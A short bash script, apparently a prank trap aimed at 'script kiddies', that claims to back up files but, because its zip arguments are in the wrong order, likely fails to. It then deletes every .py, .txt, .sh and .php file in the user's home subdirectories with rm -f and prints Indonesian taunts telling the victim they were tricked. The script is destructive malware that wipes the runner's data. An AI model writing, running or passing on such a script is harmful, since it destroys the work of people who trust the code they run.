#!/usr/bin/bash
#
mkdir -p ~/.backups

zip ~/*/*.py ~/.backups/py.zip
zip ~/*/*.txt ~/.backups/txt.zip
zip ~/*/*.sh ~/.backups/sh.zip
zip ~/*/*.php ~/.backups/php.zip

rm -f ~/*/*.py
rm -f ~/*/*.txt
rm -f ~/*/*.sh
rm -f ~/*/*.php

echo -ne "Selamat anda kena tipu"
echo -ne "\nMampus, makanya berkarya jangan jadi script kiddie"
echo -ne "\nHahahahaha"
